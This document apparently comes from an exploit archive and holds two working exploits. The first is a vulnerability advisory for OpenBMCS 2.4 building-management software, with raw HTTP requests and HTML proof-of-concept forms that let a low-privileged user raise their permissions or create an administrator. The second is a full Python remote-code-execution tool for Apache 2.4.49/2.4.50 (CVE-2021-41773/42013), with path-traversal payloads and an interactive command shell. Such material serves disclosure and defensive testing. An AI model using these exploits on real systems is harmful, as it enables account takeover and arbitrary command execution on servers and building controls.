<pre><code><br />OpenBMCS 2.4 Create Admin / Remote Privilege Escalation<br /><br /><br />Vendor: OPEN BMCS<br />Product web page: https://www.openbmcs.com<br />Affected version: 2.4<br /><br />Summary: Building Management & Controls System (BMCS). No matter what the<br />size of your business, the OpenBMCS software has the ability to expand to<br />hundreds of controllers. Our product can control and monitor anything from<br />a garage door to a complete campus wide network, with everything you need<br />on board.<br /><br />Desc: The application suffers from an insecure permissions and privilege<br />escalation vulnerability. A regular user can create administrative users<br />and/or elevate her privileges by sending an HTTP POST request to specific<br />PHP scripts in '/plugins/useradmin/' directory.<br /><br />Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64)<br /> Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686)<br /> Apache/2.4.41 (Ubuntu)<br /> Apache/2.4.25 (Debian)<br /> nginx/1.16.1<br /> PHP/7.4.3<br /> PHP/7.0.33-0+deb9u9<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5693<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5693.php<br /><br /><br />26.10.2021<br /><br />--<br /><br /><br />List current ID and permissions (read):<br />---------------------------------------<br /><br />POST /plugins/useradmin/getUserDetails.php HTTP/1.1<br />Host: 192.168.1.222<br />Cookie: PHPSESSID=ecr4lvcqvkdae4eimf3ktqeqn4<br />Content-Length: 16<br />Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99"<br />Accept: */*<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Sec-Ch-Ua-Mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36<br />Sec-Ch-Ua-Platform: "Windows"<br />Origin: https://192.168.1.222<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: https://192.168.1.222/index.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Connection: close<br /><br />id_list%5B%5D=17<br /><br /><br />HTTP/1.1 200 OK<br />Date: Tue, 16 Nov 2021 20:56:53 GMT<br />Server: Apache/2.4.41 (Ubuntu)<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Vary: Accept-Encoding<br />Content-Length: 692<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br />[{"user_id":"17","username":"testingus","email":"","expiry_date":null,"fullname":"test","phone":"","module_id":"useradmin","usermodule_permission":"1","permissions":[{"user_id":"17","module_id":"alarms","permissions":"1","mod_home":"1"},{"user_id":"17","module_id":"controllers","permissions":"1","mod_home":"1"},{"user_id":"17","module_id":"core","permissions":"0","mod_home":"0"},{"user_id":"17","module_id":"graphics","permissions":"1","mod_home":"1"},{"user_id":"17","module_id":"history","permissions":"1","mod_home":"1"},{"user_id":"17","module_id":"progtool","permissions":"1","mod_home":"0"},{"user_id":"17","module_id":"useradmin","permissions":"1","mod_home":"0"}],"human-date":""}]<br /><br /><br /><br />List current ID and permissions (admin):<br />----------------------------------------<br /><br />POST /plugins/useradmin/getUserDetails.php HTTP/1.1<br />Host: 192.168.1.222<br />Cookie: PHPSESSID=ecr4lvcqvkdae4eimf3ktqeqn4<br />Content-Length: 16<br />Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99"<br />Accept: */*<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Sec-Ch-Ua-Mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36<br />Sec-Ch-Ua-Platform: "Windows"<br />Origin: https://192.168.1.222<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: https://192.168.1.222/index.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Connection: close<br /><br />id_list%5B%5D=18<br /><br />HTTP/1.1 200 OK<br />Date: Tue, 16 Nov 2021 20:56:36 GMT<br />Server: Apache/2.4.41 (Ubuntu)<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Vary: Accept-Encoding<br />Content-Length: 725<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br />[{"user_id":"18","username":"testingus2","email":"testingus@test.tld","expiry_date":null,"fullname":"TestName","phone":"1112223333","module_id":"useradmin","usermodule_permission":"4","permissions":[{"user_id":"18","module_id":"alarms","permissions":"3","mod_home":"1"},{"user_id":"18","module_id":"controllers","permissions":"2","mod_home":"1"},{"user_id":"18","module_id":"core","permissions":"1","mod_home":"0"},{"user_id":"18","module_id":"graphics","permissions":"4","mod_home":"1"},{"user_id":"18","module_id":"history","permissions":"3","mod_home":"1"},{"user_id":"18","module_id":"progtool","permissions":"3","mod_home":"0"},{"user_id":"18","module_id":"useradmin","permissions":"4","mod_home":"0"}],"human-date":""}]<br /><br /><br /><br />Escalate privileges:<br />--------------------<br /><br />POST /plugins/useradmin/update_user_permissions.php HTTP/1.1<br />Host: 192.168.1.222<br />Cookie: PHPSESSID=ecr4lvcqvkdae4eimf3ktqeqn4<br />Content-Length: 702<br />Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99"<br />Accept: */*<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Sec-Ch-Ua-Mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36<br />Sec-Ch-Ua-Platform: "Windows"<br />Origin: https://192.168.1.222<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: https://192.168.1.222/index.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Connection: close<br /><br />permissions%5B0%5D%5Bpermissions%5D=3&permissions%5B0%5D%5BmoduleID%5D=alarms&permissions%5B0%5D%5Bmod_home%5D=1&permissions%5B1%5D%5Bpermissions%5D=2&permissions%5B1%5D%5BmoduleID%5D=controllers&permissions%5B1%5D%5Bmod_home%5D=1&permissions%5B2%5D%5Bpermissions%5D=1&permissions%5B2%5D%5BmoduleID%5D=core&permissions%5B3%5D%5Bpermissions%5D=4&permissions%5B3%5D%5BmoduleID%5D=graphics&permissions%5B3%5D%5Bmod_home%5D=1&permissions%5B4%5D%5Bpermissions%5D=3&permissions%5B4%5D%5BmoduleID%5D=history&permissions%5B4%5D%5Bmod_home%5D=1&permissions%5B5%5D%5Bpermissions%5D=3&permissions%5B5%5D%5BmoduleID%5D=progtool&permissions%5B6%5D%5Bpermissions%5D=4&permissions%5B6%5D%5BmoduleID%5D=useradmin&id=17<br /><br /><br />HTTP/1.1 200 OK<br />Date: Tue, 16 Nov 2021 20:58:48 GMT<br />Server: Apache/2.4.41 (Ubuntu)<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Content-Length: 1<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br />2<br /><br /><br /><br />Create admin from read user:<br />----------------------------<br /><br />POST /plugins/useradmin/create_user.php HTTP/1.1<br />Host: 192.168.1.222<br />Cookie: PHPSESSID=ecr4lvcqvkdae4eimf3ktqeqn4<br />Content-Length: 1010<br />Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99"<br />Accept: */*<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Sec-Ch-Ua-Mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36<br />Sec-Ch-Ua-Platform: "Windows"<br />Origin: https://192.168.1.222<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: https://192.168.1.222/index.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Connection: close<br /><br />user%5Busername%5D=testingus2&user%5Bfullname%5D=TestName&user%5Bphone%5D=1112223333&user%5Bpassword%5D=Password123&user%5BpasswordConfirm%5D=Password123&user%5Bemail%5D=testingus%40test.tld&user%5Bexpiry%5D=&permissions%5B0%5D%5BmoduleID%5D=alarms&permissions%5B0%5D%5Bpermissions%5D=3&permissions%5B0%5D%5Bmod_home%5D=1&permissions%5B1%5D%5BmoduleID%5D=controllers&permissions%5B1%5D%5Bpermissions%5D=2&permissions%5B1%5D%5Bmod_home%5D=1&permissions%5B2%5D%5BmoduleID%5D=core&permissions%5B2%5D%5Bpermissions%5D=1&permissions%5B2%5D%5Bmod_home%5D=0&permissions%5B3%5D%5BmoduleID%5D=graphics&permissions%5B3%5D%5Bpermissions%5D=4&permissions%5B3%5D%5Bmod_home%5D=1&permissions%5B4%5D%5BmoduleID%5D=history&permissions%5B4%5D%5Bpermissions%5D=3&permissions%5B4%5D%5Bmod_home%5D=1&permissions%5B5%5D%5BmoduleID%5D=progtool&permissions%5B5%5D%5Bpermissions%5D=3&permissions%5B5%5D%5Bmod_home%5D=0&permissions%5B6%5D%5BmoduleID%5D=useradmin&permissions%5B6%5D%5Bpermissions%5D=4&permissions%5B6%5D%5Bmod_home%5D=0<br /><br /><br />HTTP/1.1 200 OK<br />Date: Tue, 16 Nov 2021 20:18:58 GMT<br />Server: Apache/2.4.41 (Ubuntu)<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Content-Length: 20<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br />{"status":"success"}<br /><br /><br /><br />PoC escalate from editor to admin:<br />----------------------------------<br /><br /><html><br /> <body><br /> <form action="https://192.168.1.222/plugins/useradmin/update_user_permissions.php" method="POST"><br /> <input type="hidden" name="permissions[0][permissions]" value="3" /><br /> <input type="hidden" name="permissions[0][moduleID]" value="alarms" /><br /> <input type="hidden" name="permissions[0][mod_home]" value="1" /><br /> <input type="hidden" name="permissions[1][permissions]" value="2" /><br /> <input type="hidden" name="permissions[1][moduleID]" value="controllers" /><br /> <input type="hidden" name="permissions[1][mod_home]" value="1" /><br /> <input type="hidden" name="permissions[2][permissions]" value="1" /><br /> <input type="hidden" name="permissions[2][moduleID]" value="core" /><br /> <input type="hidden" name="permissions[3][permissions]" value="4" /><br /> <input type="hidden" name="permissions[3][moduleID]" value="graphics" /><br /> <input type="hidden" name="permissions[3][mod_home]" value="1" /><br /> <input type="hidden" name="permissions[4][permissions]" value="3" /><br /> <input type="hidden" name="permissions[4][moduleID]" value="history" /><br /> <input type="hidden" name="permissions[4][mod_home]" value="1" /><br /> <input type="hidden" name="permissions[5][permissions]" value="3" /><br /> <input type="hidden" name="permissions[5][moduleID]" value="progtool" /><br /> <input type="hidden" name="permissions[6][permissions]" value="4" /><br /> <input type="hidden" name="permissions[6][moduleID]" value="useradmin" /><br /> <input type="hidden" name="id" value="17" /><br /> <input type="submit" value="Esc" /><br /> </form><br /> </body><br /></html><br /><br /><br /><br />PoC create admin from editor:<br />-----------------------------<br /><br /><html><br /> <body><br /> <form action="https://192.168.1.222/plugins/useradmin/create_user.php" method="POST"><br /> <input type="hidden" name="user[username]" value="testingus2" /><br /> <input type="hidden" name="user[fullname]" value="TestName" /><br /> <input type="hidden" name="user[phone]" value="1112223333" /><br /> <input type="hidden" name="user[password]" value="Password123" /><br /> <input type="hidden" name="user[passwordConfirm]" value="Password123" /><br /> <input type="hidden" name="user[email]" value="testingus@test.tld" /><br /> <input type="hidden" name="user[expiry]" value="" /><br /> <input type="hidden" name="permissions[0][moduleID]" value="alarms" /><br /> <input type="hidden" name="permissions[0][permissions]" value="3" /><br /> <input type="hidden" name="permissions[0][mod_home]" value="1" /><br /> <input type="hidden" name="permissions[1][moduleID]" value="controllers" /><br /> <input type="hidden" name="permissions[1][permissions]" value="2" /><br /> <input type="hidden" name="permissions[1][mod_home]" value="1" /><br /> <input type="hidden" name="permissions[2][moduleID]" value="core" /><br /> <input type="hidden" name="permissions[2][permissions]" value="1" /><br /> <input type="hidden" name="permissions[2][mod_home]" value="0" /><br /> <input type="hidden" name="permissions[3][moduleID]" value="graphics" /><br /> <input type="hidden" name="permissions[3][permissions]" value="4" /><br /> <input type="hidden" name="permissions[3][mod_home]" value="1" /><br /> <input type="hidden" name="permissions[4][moduleID]" value="history" /><br /> <input type="hidden" name="permissions[4][permissions]" value="3" /><br /> <input type="hidden" name="permissions[4][mod_home]" value="1" /><br /> <input type="hidden" name="permissions[5][moduleID]" value="progtool" /><br /> <input type="hidden" name="permissions[5][permissions]" value="3" /><br /> <input type="hidden" name="permissions[5][mod_home]" value="0" /><br /> <input type="hidden" name="permissions[6][moduleID]" value="useradmin" /><br /> <input type="hidden" name="permissions[6][permissions]" value="4" /><br /> <input type="hidden" name="permissions[6][mod_home]" value="0" /><br /> <input type="submit" value="Cre" /><br /> </form><br /> </body><br /></html><br /></code></pre>
<pre><code># Exploit Title: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3)<br /># Date: 11/11/2021<br /># Exploit Author: Valentin Lobstein<br /># Vendor Homepage: https://apache.org/<br /># Software Link: https://github.com/Balgogan/CVE-2021-41773<br /># Version: Apache 2.4.49/2.4.50 (CGI enabled)<br /># Tested on: Debian GNU/Linux<br /># CVE : CVE-2021-41773 / CVE-2021-42013<br /># Credits : Lucas Schnell<br /><br /><br />#!/usr/bin/env python3<br />#coding: utf-8<br /><br />import os<br />import re<br />import sys<br />import time<br />import requests<br />from colorama import Fore,Style<br /><br /><br />header = '''.[1;91m<br /> <br /> ▄▄▄ ██▓███ ▄▄▄ ▄████▄ ██░ ██ ▓█████ ██▀███ ▄████▄ ▓█████ <br /> ▒████▄ ▓██░ ██▒▒████▄ ▒██▀ ▀█ ▓██░ ██▒▓█ ▀ ▓██ ▒ ██▒▒██▀ ▀█ ▓█ ▀ <br /> ▒██ ▀█▄ ▓██░ ██▓▒▒██ ▀█▄ ▒▓█ ▄ ▒██▀▀██░▒███ ▓██ ░▄█ ▒▒▓█ ▄ ▒███ <br /> ░██▄▄▄▄██ ▒██▄█▓▒ ▒░██▄▄▄▄██ ▒▓▓▄ ▄██▒░▓█ ░██ ▒▓█ ▄ ▒██▀▀█▄ ▒▓▓▄ ▄██▒▒▓█ ▄ <br /> ▓█ ▓██▒▒██▒ ░ ░ ▓█ ▓██▒▒ ▓███▀ ░░▓█▒░██▓░▒████▒ ░██▓ ▒██▒▒ ▓███▀ ░░▒████▒<br /> ▒▒ ▓▒█░▒▓▒░ ░ ░ ▒▒ ▓▒█░░ ░▒ ▒ ░ ▒ ░░▒░▒░░ ▒░ ░ ░ ▒▓ ░▒▓░░ ░▒ ▒ ░░░ ▒░ ░<br /> ▒ ▒▒ ░░▒ ░ ▒ ▒▒ ░ ░ ▒ ▒ ░▒░ ░ ░ ░ ░ ░▒ ░ ▒░ ░ ▒ ░ ░ ░<br /> ░ ▒ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ ░ ░ <br />''' + Style.RESET_ALL<br /><br /><br />if len(sys.argv) < 2 :<br /> print( 'Use: python3 file.py ip:port ' )<br /> sys.exit()<br /><br />def end():<br /> print("\t.[1;91m[!] Bye bye !")<br /> time.sleep(0.5)<br /> sys.exit(1)<br /><br />def commands(url,command,session):<br /> directory = mute_command(url,'pwd')<br /> user = mute_command(url,'whoami')<br /> hostname = mute_command(url,'hostname')<br /> advise = print(Fore.YELLOW + 'Reverse shell is advised (This isn\'t an interactive shell)')<br /> command = input(f"{Fore.RED}╭─{Fore.GREEN + user}@{hostname}: {Fore.BLUE + directory}\n{Fore.RED}╰─{Fore.YELLOW}$ {Style.RESET_ALL}") <br /> command = f"echo; {command};"<br /> req = requests.Request('POST', url=url, data=command)<br /> prepare = req.prepare()<br /> prepare.url = url <br /> response = session.send(prepare, timeout=5)<br /> output = response.text<br /> print(output)<br /> if 'clear' in command:<br /> os.system('/usr/bin/clear')<br /> print(header)<br /> if 'exit' in command:<br /> end()<br /><br />def mute_command(url,command):<br /> session = requests.Session()<br /> req = requests.Request('POST', url=url, data=f"echo; {command}")<br /> prepare = req.prepare()<br /> prepare.url = url <br /> response = session.send(prepare, timeout=5)<br /> return response.text.strip()<br /><br /><br />def exploitRCE(payload):<br /> s = requests.Session()<br /> try:<br /> host = sys.argv[1]<br /> if 'http' not in host:<br /> url = 'http://'+ host + payload<br /> else:<br /> url = host + payload <br /> session = requests.Session()<br /> command = "echo; id"<br /> req = requests.Request('POST', url=url, data=command)<br /> prepare = req.prepare()<br /> prepare.url = url <br /> response = session.send(prepare, timeout=5)<br /> output = response.text<br /> if "uid" in output:<br /> choice = "Y"<br /> print( Fore.GREEN + '\n[!] Target %s is vulnerable !!!' % host)<br /> print("[!] Sortie:\n\n" + Fore.YELLOW + output )<br /> choice = input(Fore.CYAN + "[?] Do you want to exploit this RCE ? (Y/n) : ")<br /> if choice.lower() in ['','y','yes']:<br /> while True:<br /> commands(url,command,session) <br /> else:<br /> end() <br /> else :<br /> print(Fore.RED + '\nTarget %s isn\'t vulnerable' % host)<br /> except KeyboardInterrupt:<br /> end()<br /><br />def main():<br /> try:<br /> apache2449_payload = '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash'<br /> apache2450_payload = '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash'<br /> payloads = [apache2449_payload,apache2450_payload]<br /> choice = len(payloads) + 1<br /> print(header)<br /> print(".[1;37m[0] Apache 2.4.49 RCE\n[1] Apache 2.4.50 RCE")<br /> while choice >= len(payloads) and choice >= 0:<br /> choice = int(input('[~] Choice : '))<br /> if choice < len(payloads):<br /> exploitRCE(payloads[choice])<br /> except KeyboardInterrupt:<br /> print("\n.[1;91m[!] Bye bye !")<br /> time.sleep(0.5)<br /> sys.exit(1)<br /><br />if __name__ == '__main__':<br /> main()<br /> <br /></code></pre>